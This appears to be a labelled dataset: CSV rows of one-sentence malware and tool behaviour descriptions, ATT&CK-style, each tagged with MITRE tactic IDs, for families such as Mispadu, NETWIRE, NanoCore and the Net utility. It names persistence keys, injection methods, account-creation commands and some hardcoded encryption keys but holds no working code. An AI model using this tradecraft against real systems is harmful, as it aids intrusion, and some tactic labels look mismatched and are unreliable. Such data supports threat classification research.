Mispadu can log keystrokes on the victim's machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
Mispadu has relied on users to execute malicious files in order to gain execution on victim machines.,['TA0002:Execution']
Mispadu has been installed via MSI installer.,['TA0005:Defense Evasion']
"Mispadu has used a variety of Windows API calls, including ShellExecute and WriteProcessMemory.",['TA0002:Execution']
Mispadu can enumerate the running processes on a compromised host.,['TA0007:Discovery']
Mispadu's binary is injected into memory via `WriteProcessMemory`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Mispadu creates a link in the startup folder for persistence. Mispadu adds persistence via the registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mispadu uses RunDLL32 for execution via its injector DLL.,['TA0005:Defense Evasion']
Mispadu has the ability to capture screenshots on compromised hosts.,['TA0009:Collection']
Mispadu can list installed security products in the victim’s environment.,['TA0007:Discovery']
Mispadu has been spread via malicious links embedded in emails.,['TA0001:Initial Access']
"Mispadu can run checks to verify if it is running within a virtualized environments including Hyper-V, VirtualBox or VMWare and will terminate execution if the computer name is “JOHN-PC.”","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Mispadu collects the OS version, computer name, and language ID.",['TA0007:Discovery']
Mispadu checks and will terminate execution if the compromised system’s language ID is not Spanish or Portuguese.,['TA0007:Discovery']
Mispadu’s dropper uses VBS files to install payloads and perform execution.,['TA0002:Execution']
Mivast has the capability to download and execute .exe files.,['TA0011:Command and Control']
Mivast creates the following Registry entry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mivast has the capability to gather NTLM password information.,['TA0006:Credential Access']
Mivast has the capability to open a remote shell and run basic commands.,['TA0002:Execution']
MobileOrder has a command to upload to its C2 server victim browser bookmarks.,['TA0007:Discovery']
MobileOrder exfiltrates data collected from the victim mobile device.,['TA0009:Collection']
MobileOrder exfiltrates data to its C2 server over the same protocol as C2 communications.,['TA0010:Exfiltration']
"MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.",['TA0007:Discovery']
MobileOrder has a command to download a file from the C2 server to the victim mobile device's SD card.,['TA0011:Command and Control']
MobileOrder has a command to upload information about all running processes to its C2 server.,['TA0007:Discovery']
"MobileOrder has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.",['TA0007:Discovery']
MoleNet can download additional payloads from the C2.,['TA0011:Command and Control']
MoleNet can use PowerShell to set persistence.,['TA0002:Execution']
MoleNet can achieve persitence on the infected machine by setting the Registry run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
MoleNet can use WMI commands to check the system for firewall and antivirus software.,['TA0007:Discovery']
MoleNet can collect information about the about the system.,['TA0007:Discovery']
MoleNet can execute commands via the command line utility.,['TA0002:Execution']
MoleNet can perform WMI commands on the system.,['TA0002:Execution']
"Moneybird targets a common set of file types such as documents, certificates, and database files for encryption while avoiding executable, dynamic linked libraries, and similar items.",['TA0040:Impact']
Moneybird contains a configuration blob embedded in the malware itself.,['TA0005:Defense Evasion']
Mongall has the ability to upload files from victim's machines.,['TA0009:Collection']
Mongall has the ability to decrypt its payload prior to execution.,['TA0005:Defense Evasion']
Mongall can inject a DLL into `rundll32.exe` for execution.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Mongall can upload files and information from a compromised host to its C2 server.,['TA0010:Exfiltration']
Mongall can download files to targeted systems.,['TA0011:Command and Control']
Mongall has relied on a user opening a malicious document for execution.,['TA0002:Execution']
Mongall can identify removable media attached to compromised hosts.,['TA0007:Discovery']
Mongall can establish persistence with the auto start function including using the value `EverNoteTrayUService`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mongall can use `rundll32.exe` for execution.,['TA0005:Defense Evasion']
Mongall has been packed with Themida.,['TA0005:Defense Evasion']
Mongall can use Base64 to encode information sent to its C2.,['TA0011:Command and Control']
Mongall has the ability to RC4 encrypt C2 communications.,['TA0011:Command and Control']
Mongall can identify drives on compromised hosts and retrieve the hostname via `gethostbyname`.,['TA0007:Discovery']
Mongall can use HTTP for C2 communication.,['TA0011:Command and Control']
MoonWind can delete itself or specified files.,['TA0005:Defense Evasion']
MoonWind has a command to return a directory listing for a specified directory.,['TA0007:Discovery']
MoonWind has a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
MoonWind saves information from its keylogging routine as a .zip file in the present working directory.,['TA0009:Collection']
MoonWind completes network communication via raw sockets.,['TA0011:Command and Control']
"MoonWind communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.",['TA0011:Command and Control']
MoonWind obtains the number of removable drives from the victim.,['TA0007:Discovery']
MoonWind has a command to return a list of running processes.,['TA0007:Discovery']
MoonWind encrypts C2 traffic using RC4 with a static key.,['TA0011:Command and Control']
"MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.",['TA0007:Discovery']
MoonWind obtains the victim IP address.,['TA0007:Discovery']
MoonWind obtains the victim username.,['TA0007:Discovery']
MoonWind obtains the victim's current time.,['TA0007:Discovery']
"MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.",['TA0002:Execution']
"MoonWind installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
More_eggs has used a signed binary shellcode loader and a signed Dynamic Link Library to create a reverse shell.,['TA0005:Defense Evasion']
More_eggs will decode malware components that are then dropped to the system.,['TA0005:Defense Evasion']
More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end.,['TA0005:Defense Evasion']
More_eggs can remove itself from a system.,['TA0005:Defense Evasion']
More_eggs can download and launch additional payloads.,['TA0011:Command and Control']
More_eggs has used HTTP GET requests to check internet connectivity.,['TA0007:Discovery']
More_eggs has used regsvr32.exe to execute the malicious DLL.,['TA0005:Defense Evasion']
More_eggs can obtain information on installed anti-malware programs.,['TA0007:Discovery']
"More_eggs has used basE91 encoding, along with encryption, for C2 communication.",['TA0011:Command and Control']
More_eggs has used an RC4-based encryption method for its C2 communications.,['TA0011:Command and Control']
More_eggs has the capability to gather the OS version and computer name.,['TA0007:Discovery']
More_eggs has the capability to gather the IP address from the victim's machine.,['TA0007:Discovery']
More_eggs has the capability to gather the username from the victim's machine.,['TA0007:Discovery']
More_eggs uses HTTPS for C2.,['TA0011:Command and Control']
More_eggs has used cmd.exe for execution.,['TA0002:Execution']
Mori can use DNS tunneling to communicate with C2.,['TA0011:Command and Control']
Mori can resolve networking APIs from strings that are ADD-encrypted.,['TA0005:Defense Evasion']
Mori can delete its DLL file and related files by Registry value.,['TA0005:Defense Evasion']
Mori has obfuscated the FML.dll with 200MB of junk data.,['TA0011:Command and Control']
Mori can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values.,['TA0005:Defense Evasion']
Mori can read data from the Registry including from `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\`.,['TA0007:Discovery']
Mori can use `regsvr32.exe` for DLL execution.,['TA0005:Defense Evasion']
Mori can use Base64 encoded JSON libraries used in C2.,['TA0011:Command and Control']
Mori can communicate using HTTP over IPv4 or IPv6 depending on a flag set.,['TA0011:Command and Control']
Mosquito uses COM hijacking as a method of persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mosquito’s installer is obfuscated with a custom crypter to obfuscate the installer.,['TA0005:Defense Evasion']
Mosquito deletes files using DeleteFileW API call.,['TA0005:Defense Evasion']
Mosquito stores configuration values under the Registry key HKCU\Software\Microsoft\dllname.,['TA0005:Defense Evasion']
Mosquito can upload and download files to the victim.,['TA0011:Command and Control']
Mosquito can modify Registry keys under HKCU\Software\Microsoft\dllname to store configuration values. Mosquito also modifies Registry keys under HKCR\CLSID\...\InprocServer32 with a path to the launcher.,['TA0005:Defense Evasion']
Mosquito leverages the CreateProcess and LoadLibrary calls to execute files with the .dll and .exe extensions.,['TA0002:Execution']
Mosquito can launch PowerShell Scripts.,['TA0002:Execution']
Mosquito runs tasklist to obtain running processes.,['TA0007:Discovery']
Mosquito establishes persistence under the Registry key HKCU\Software\Run auto_update.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.,['TA0005:Defense Evasion']
Mosquito's installer searches the Registry and system to see if specific antivirus tools are installed on the system.,['TA0007:Discovery']
"Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.",['TA0011:Command and Control']
Mosquito uses the ipconfig command.,['TA0007:Discovery']
Mosquito runs whoami on the victim’s machine.,['TA0007:Discovery']
Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.,['TA0002:Execution']
Mosquito's installer uses WMI to search for antivirus display names.,['TA0002:Execution']
MultiLayer Wiper removes Windows event logs during execution.,['TA0005:Defense Evasion']
"MultiLayer Wiper deletes files on network drives, but corrupts and overwrites with random data files stored locally.",['TA0040:Impact']
MultiLayer Wiper removes the Volume Shadow Copy service from infected devices along with all present shadow copies.,['TA0005:Defense Evasion']
"MultiLayer Wiper opens a handle to \\\\\\\\.\\\\PhysicalDrive0 and wipes the first 512 bytes of data from this location, removing the boot sector.",['TA0040:Impact']
"MultiLayer Wiper contains two binaries in its resources section, MultiList and MultiWip. MultiLayer Wiper drops and executes each of these items when run, then deletes them after execution.",['TA0005:Defense Evasion']
"MultiLayer Wiper uses a batch file, remover.bat to delete malware artifacts and the batch file itself during execution.",['TA0005:Defense Evasion']
"MultiLayer Wiper generates a list of all files and paths on the fixed drives of an infected system, enumerating all files on the system except specific folders defined in a hardcoded list.",['TA0007:Discovery']
MultiLayer Wiper uses a batch script to clear file system cache memory via the ProcessIdleTasks export in advapi32.dll as an anti-analysis and anti-forensics technique.,['TA0005:Defense Evasion']
MultiLayer Wiper wipes the boot sector of infected systems to inhibit system recovery.,['TA0040:Impact']
MultiLayer Wiper creates a malicious scheduled task that launches a batch file to remove Windows Event Logs.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
MultiLayer Wiper changes the original path information of deleted files to make recovery efforts more difficult.,['TA0040:Impact']
MultiLayer Wiper reboots the infected system following wiping and related tasks to prevent system recovery.,['TA0040:Impact']
"MultiLayer Wiper changes timestamps of overwritten files to either 1601.1.1 for NTFS filesystems, or 1980.1.1 for all other filesystems.",['TA0005:Defense Evasion']
MultiLayer Wiper uses a batch script launched via a scheduled task to delete Windows Event Logs.,['TA0002:Execution']
Mythic supports SSL encrypted C2.,['TA0011:Command and Control']
Mythic supports scripting of file downloads from agents.,['TA0009:Collection']
Mythic supports DNS-based C2 profiles.,['TA0011:Command and Control']
Mythic provides various transform functions to encode and/or randomize C2 data.,['TA0011:Command and Control']
Mythic supports custom chunk sizes used to upload/download files.,['TA0010:Exfiltration']
Mythic supports domain fronting via custom request headers.,['TA0011:Command and Control']
Mythic can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.,['TA0011:Command and Control']
Mythic can use a list of C2 URLs as fallback mechanisms in case one IP or domain gets blocked.,['TA0011:Command and Control']
Mythic supports SMB-based peer-to-peer C2 profiles.,['TA0011:Command and Control']
Mythic can leverage a peer-to-peer C2 profile between agents.,['TA0011:Command and Control']
Mythic supports WebSocket and TCP-based C2 profiles.,['TA0011:Command and Control']
Mythic can use SOCKS proxies to tunnel traffic through another protocol.,['TA0011:Command and Control']
Mythic supports HTTP-based C2 profiles.,['TA0011:Command and Control']
NBTscan can be used to scan IP networks.,['TA0007:Discovery']
NBTscan can dump and print whole packet content.,"['TA0006:Credential Access', 'TA0007:Discovery']"
NBTscan can list NetBIOS computer names.,['TA0007:Discovery']
NBTscan can be used to collect MAC addresses.,['TA0007:Discovery']
NBTscan can list active users on the system.,['TA0007:Discovery']
NDiskMonitor can obtain a list of all files and directories as well as logical drives.,['TA0007:Discovery']
NDiskMonitor can download and execute a file from given URL.,['TA0011:Command and Control']
NDiskMonitor uses AES to encrypt certain information sent over its C2 channel.,['TA0011:Command and Control']
NDiskMonitor obtains the victim computer name and encrypts the information to send over its C2 channel.,['TA0007:Discovery']
NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel.,['TA0007:Discovery']
Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519.,['TA0011:Command and Control']
NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.,['TA0011:Command and Control']
NETEAGLE is capable of reading files over the C2 channel.,['TA0010:Exfiltration']
"NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.",['TA0011:Command and Control']
"NETEAGLE allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.",['TA0007:Discovery']
"If NETEAGLE does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, NETEAGLE will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.",['TA0011:Command and Control']
NETEAGLE can send process listings over the C2 channel.,['TA0007:Discovery']
"The ""SCOUT"" variant of NETEAGLE achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key ""ScoutEagle.""",['TA0011:Command and Control']
"NETEAGLE will attempt to detect if the infected host is configured to a proxy. If so, NETEAGLE will send beacons via an HTTP POST request. NETEAGLE will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.",['TA0011:Command and Control']
NETEAGLE allows adversaries to execute shell commands on the infected host.,['TA0002:Execution']
NETWIRE can discover and close windows on controlled systems.,['TA0007:Discovery']
NETWIRE has the ability to compress archived screenshots.,['TA0009:Collection']
NETWIRE has used a custom encryption algorithm to encrypt collected data.,['TA0009:Collection']
NETWIRE can automatically archive collected data.,['TA0009:Collection']
NETWIRE can retrieve passwords from messaging and mail client applications.,['TA0006:Credential Access']
"NETWIRE has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.",['TA0006:Credential Access']
NETWIRE can use crontabs to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
NETWIRE can encrypt C2 communications.,['TA0011:Command and Control']
NETWIRE has the ability to search for files on the compromised host.,['TA0007:Discovery']
NETWIRE can store its configuration information in the Registry under `HKCU:\Software\Netwire`.,['TA0005:Defense Evasion']
NETWIRE can copy itself to and launch itself from hidden folders.,['TA0005:Defense Evasion']
NETWIRE can downloaded payloads from C2 to the compromised host.,['TA0011:Command and Control']
The NETWIRE client has been signed by fake and invalid digital certificates.,['TA0005:Defense Evasion']
NETWIRE can perform keylogging.,"['TA0009:Collection', 'TA0006:Credential Access']"
NETWIRE can use launch agents for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NETWIRE has the ability to write collected data to a file created in the ./LOGS directory.,['TA0009:Collection']
NETWIRE can persist via startup options for Login items.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NETWIRE has been executed through luring victims into opening malicious documents.,['TA0002:Execution']
NETWIRE has been executed through convincing victims into clicking malicious links.,['TA0002:Execution']
NETWIRE has masqueraded as legitimate software including TeamViewer and macOS Finder.,['TA0005:Defense Evasion']
NETWIRE can modify the Registry to store its configuration information.,['TA0005:Defense Evasion']
"NETWIRE can use Native API including CreateProcess GetProcessById, and WriteProcessMemory.",['TA0002:Execution']
NETWIRE can use TCP in C2 communications.,['TA0011:Command and Control']
"NETWIRE has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.",['TA0005:Defense Evasion']
The NETWIRE binary has been executed via PowerShell script.,['TA0002:Execution']
NETWIRE can discover processes on compromised hosts.,['TA0007:Discovery']
The NETWIRE payload has been injected into benign Microsoft executables via process hollowing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
NETWIRE can implement use of proxies to pivot traffic.,['TA0011:Command and Control']
NETWIRE creates a Registry start-up entry to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NETWIRE can create a scheduled task to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
NETWIRE can capture the victim's screen.,['TA0009:Collection']
NETWIRE has used .NET packer tools to evade detection.,['TA0005:Defense Evasion']
NETWIRE has been spread via e-mail campaigns utilizing malicious attachments.,['TA0001:Initial Access']
NETWIRE has been spread via e-mail campaigns utilizing malicious links.,['TA0001:Initial Access']
NETWIRE can use AES encryption for C2 data transferred.,['TA0011:Command and Control']
NETWIRE can discover and collect victim system information.,['TA0007:Discovery']
NETWIRE can collect the IP address of a compromised host.,['TA0007:Discovery']
NETWIRE can capture session logon details from a compromised host.,['TA0007:Discovery']
NETWIRE has the ability to use /bin/bash and /bin/sh to execute commands.,['TA0002:Execution']
NETWIRE has been executed through use of VBScripts.,['TA0002:Execution']
NETWIRE has the ability to communicate over HTTP.,['TA0011:Command and Control']
NETWIRE has used web services including Paste.ee to host payloads.,['TA0011:Command and Control']
NETWIRE can issue commands using cmd.exe.,['TA0002:Execution']
NETWIRE can use XDG Autostart Entries to establish persistence on Linux systems.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NGLite has abused NKN infrastructure for its C2 communication.,['TA0011:Command and Control']
"NGLite will use an AES encrypted channel for command and control purposes, in one case using the key WHATswrongwithUu.",['TA0011:Command and Control']
NGLite identifies the victim system MAC and IPv4 addresses and uses these to establish a victim identifier.,['TA0007:Discovery']
NGLite will run the whoami command to gather system information and return this to the command and control server.,['TA0007:Discovery']
NGLite will initially beacon out to the NKN network via an HTTP POST over TCP 30003.,['TA0011:Command and Control']
NKAbuse uses a Cron job to establish persistence when infecting Linux hosts.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
NKAbuse utilizes external services such as ifconfig.me to identify the victim machine's IP address.,['TA0007:Discovery']
NKAbuse has abused the NKN public blockchain protocol for its C2 communications.,['TA0011:Command and Control']
NKAbuse enables multiple types of network denial of service capabilities across several protocols post-installation.,['TA0040:Impact']
NKAbuse will check victim systems to ensure only one copy of the malware is running.,['TA0007:Discovery']
NKAbuse can take screenshots of the victim machine.,['TA0009:Collection']
"NKAbuse conducts multiple system checks and includes these in subsequent ""heartbeat"" messages to the malware's command and control server.",['TA0007:Discovery']
NKAbuse is initially installed and executed through an initial shell script.,['TA0002:Execution']
NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
"NOKKI uses a unique, custom de-obfuscation technique.",['TA0005:Defense Evasion']
NOKKI can delete files to cover tracks.,['TA0005:Defense Evasion']
NOKKI has used FTP for C2 communications.,['TA0011:Command and Control']
NOKKI has downloaded a remote module for execution.,['TA0011:Command and Control']
NOKKI can collect data from the victim and stage it in LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp.,['TA0009:Collection']
NOKKI is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.,['TA0005:Defense Evasion']
NOKKI uses Base64 encoding for strings.,['TA0005:Defense Evasion']
NOKKI has established persistence by writing the payload to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NOKKI has used rundll32 for execution.,['TA0005:Defense Evasion']
NOKKI can gather information on drives and the operating system on the victim’s machine.,['TA0007:Discovery']
NOKKI can gather information on the victim IP address.,['TA0007:Discovery']
NOKKI can collect the username from the victim’s machine.,['TA0007:Discovery']
NOKKI can collect the current timestamp of the victim's machine.,['TA0007:Discovery']
NOKKI has used HTTP for C2 communications.,['TA0011:Command and Control']
"NPPSPY opens a new network listener for the mpnotify.exe process that is typically contacted by the Winlogon process in Windows. A new, alternative RPC channel is set up with a malicious DLL recording plaintext credentials entered into Winlogon, effectively intercepting and redirecting the logon information.","['TA0009:Collection', 'TA0006:Credential Access']"
NPPSPY collection is automatically recorded to a specified file on the victim machine.,['TA0009:Collection']
NPPSPY records data entered from the local system logon at Winlogon to capture credentials in cleartext.,['TA0009:Collection']
NPPSPY creates a network listener using the misspelled label logincontroll recorded to the Registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order.,['TA0005:Defense Evasion']
NPPSPY captures user input into the Winlogon process by redirecting RPC traffic from legitimate listening DLLs within the operating system to a newly registered malicious item that allows for recording logon information in cleartext.,"['TA0009:Collection', 'TA0006:Credential Access']"
NPPSPY modifies the Registry to record the malicious listener for output from the Winlogon process.,['TA0005:Defense Evasion']
"NPPSPY captures credentials by recording them through an alternative network listener registered to the mpnotify.exe process, allowing for cleartext recording of logon information.",['TA0006:Credential Access']
Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.,['TA0005:Defense Evasion']
Naid collects a unique identifier from a compromised host.,['TA0007:Discovery']
Naid collects the domain name from a compromised host.,['TA0007:Discovery']
Naid creates a new service to establish.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NanHaiShu uses DNS for the C2 communications.,['TA0011:Command and Control']
NanHaiShu can change Internet Explorer settings to reduce warnings about malware activity.,['TA0005:Defense Evasion']
NanHaiShu encodes files in Base64.,['TA0005:Defense Evasion']
NanHaiShu launches a script to delete their original decoy file to cover tracks.,['TA0005:Defense Evasion']
NanHaiShu can download additional files from URLs.,['TA0011:Command and Control']
NanHaiShu executes additional Jscript code on the victim's machine.,['TA0002:Execution']
NanHaiShu uses mshta.exe to load its program and files.,['TA0005:Defense Evasion']
NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NanHaiShu can gather the victim computer name and serial number.,['TA0007:Discovery']
NanHaiShu can gather information about the victim proxy server.,['TA0007:Discovery']
NanHaiShu collects the username from the victim.,['TA0007:Discovery']
NanHaiShu executes additional VBScript code on the victim's machine.,['TA0002:Execution']
NanoCore can capture audio feeds from the system.,['TA0009:Collection']
NanoCore can modify the victim's firewall.,['TA0005:Defense Evasion']
NanoCore can modify the victim's anti-virus.,['TA0005:Defense Evasion']
NanoCore has the capability to download and activate additional modules for execution.,['TA0011:Command and Control']
NanoCore can perform keylogging on the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
NanoCore has the capability to edit the Registry.,['TA0005:Defense Evasion']
NanoCore’s plugins were obfuscated with Eazfuscater.NET 3.3.,['TA0005:Defense Evasion']
NanoCore creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NanoCore uses DES to encrypt the C2 traffic.,['TA0011:Command and Control']
NanoCore gathers the IP address from the victim’s machine.,['TA0007:Discovery']
NanoCore can access the victim's webcam and capture data.,['TA0009:Collection']
NanoCore uses VBS files.,['TA0002:Execution']
NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files.,['TA0002:Execution']
NativeZone can decrypt and decode embedded Cobalt Strike beacon stage shellcode.,['TA0005:Defense Evasion']
NativeZone can check for the presence of KM.EkeyAlmaz1C.dll and will halt execution unless it is in the same directory as the rest of the malware's components.,['TA0005:Defense Evasion']
NativeZone can display an RTF document to the user to enable execution of Cobalt Strike stage shellcode.,['TA0002:Execution']
"NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.",['TA0005:Defense Evasion']
NativeZone has used rundll32 to execute a malicious DLL.,['TA0005:Defense Evasion']
NativeZone has checked if Vmware or VirtualBox VM is running on a compromised host.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
NavRAT can download files remotely.,['TA0011:Command and Control']
NavRAT logs the keystrokes on the targeted system.,"['TA0009:Collection', 'TA0006:Credential Access']"
NavRAT writes multiple outputs to a TMP file using the >> method.,['TA0009:Collection']
"NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP.",['TA0011:Command and Control']
NavRAT uses tasklist /v to check running processes.,['TA0007:Discovery']
NavRAT copies itself into a running Internet Explorer process to evade detection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
NavRAT creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
NavRAT uses systeminfo on a victim’s machine.,['TA0007:Discovery']
NavRAT leverages cmd.exe to perform discovery techniques. NavRAT loads malicious shellcode and executes it in memory.,['TA0002:Execution']
Nebulae can use DLL side-loading to gain execution.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Nebulae has the capability to upload collected files to C2.,['TA0009:Collection']
Nebulae has the ability to delete files and directories.,['TA0005:Defense Evasion']
Nebulae can list files and directories on a compromised host.,['TA0007:Discovery']
Nebulae can download files from C2.,['TA0011:Command and Control']
"Nebulae has created a service named ""Windows Update Agent1"" to appear legitimate.",['TA0005:Defense Evasion']
Nebulae uses functions named StartUserModeBrowserInjection and StopUserModeBrowserInjection indicating that it's trying to imitate chrome_frame_helper.dll.,['TA0005:Defense Evasion']
Nebulae has the ability to use CreateProcess to execute a process.,['TA0002:Execution']
Nebulae can use TCP in C2 communications.,['TA0011:Command and Control']
Nebulae can enumerate processes on a target system.,['TA0007:Discovery']
Nebulae can achieve persistence through a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Nebulae can use RC4 and XOR to encrypt C2 communications.,['TA0011:Command and Control']
"Nebulae can discover logical drive information including the drive type, free space, and volume information.",['TA0007:Discovery']
Nebulae can use CMD to execute a process.,['TA0002:Execution']
Nebulae can create a service to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Neoichor can use the Internet Explorer COM interface to connect and receive commands from C2.,['TA0002:Execution']
Neoichor can upload files from a victim's machine.,['TA0009:Collection']
Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy` Registry key.,['TA0005:Defense Evasion']
Neoichor can download additional files onto a compromised host.,['TA0011:Command and Control']
Neoichor can check for Internet connectivity by contacting bing.com with the request format `bing.com?id=`.,['TA0007:Discovery']
Neoichor has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`.,['TA0005:Defense Evasion']
Neoichor can collect the OS version and computer name from a compromised host.,['TA0007:Discovery']
Neoichor can identify the system language on a compromised host.,['TA0007:Discovery']
Neoichor can gather the IP address from an infected host.,['TA0007:Discovery']
Neoichor can collect the user name from a victim's machine.,['TA0007:Discovery']
Neoichor can use HTTP for C2 communications.,['TA0011:Command and Control']
Nerex drops a signed Microsoft DLL to disk.,['TA0005:Defense Evasion']
Nerex creates a backdoor through which remote attackers can download files onto a compromised host.,['TA0011:Command and Control']
Nerex creates a Registry subkey that registers a new service.,['TA0005:Defense Evasion']
Nerex creates a Registry subkey that registers a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
The `net localgroup` and `net group` commands in Net can be used to add existing users to local and domain groups.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Net commands used with the /domain flag can be used to gather information about and manipulate user accounts on the current domain.,['TA0007:Discovery']
The net user username \password \domain commands in Net can be used to create a domain account.,['TA0003:Persistence']
Commands such as net group /domain can be used in Net to gather information about and manipulate groups.,['TA0007:Discovery']
Commands under net user can be used in Net to gather information about and manipulate user accounts.,['TA0007:Discovery']
The net user username \password commands in Net can be used to create a local account.,['TA0003:Persistence']
Commands such as net group and net localgroup can be used in Net to gather information about and manipulate groups.,['TA0007:Discovery']
The net use \\system\share /delete command can be used in Net to remove an established connection to a network share.,['TA0005:Defense Evasion']
The net view \\remotesystem and net share commands in Net can be used to find shared drives and directories on remote and local systems respectively.,['TA0007:Discovery']
The net accounts and net accounts /domain commands with Net can be used to obtain password policy information.,['TA0007:Discovery']
Commands such as net view can be used in Net to gather information about available remote systems.,['TA0007:Discovery']
Lateral movement can be done with Net through net use commands to connect to the on remote systems.,['TA0008:Lateral Movement']
The net start and net stop commands can be used in Net to execute or stop Windows services.,['TA0002:Execution']
Commands such as net use and net session can be used in Net to gather information about network connections from a particular host.,['TA0007:Discovery']
The net start command can be used in Net to find information about Windows services.,['TA0007:Discovery']
The net time command can be used in Net to determine the local or remote system time.,['TA0007:Discovery']
Net Crawler uses credential dumpers such as Mimikatz and Windows Credential Editor to extract cached credentials from Windows systems.,['TA0006:Credential Access']
Net Crawler uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.,['TA0006:Credential Access']
Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.,['TA0008:Lateral Movement']
Net Crawler uses PsExec to perform remote service manipulation to execute a copy of itself as part of lateral movement.,['TA0002:Execution']
NetTraveler reports window names along with keylogger information to provide application context.,['TA0007:Discovery']
NetTraveler contains a keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Netwalker's PowerShell script has been obfuscated with multiple layers including base64 and hexadecimal encoding and XOR-encryption, as well as obfuscated PowerShell functions and variables.",['TA0005:Defense Evasion']
Netwalker can encrypt files on infected machines to extort victims.,['TA0040:Impact']
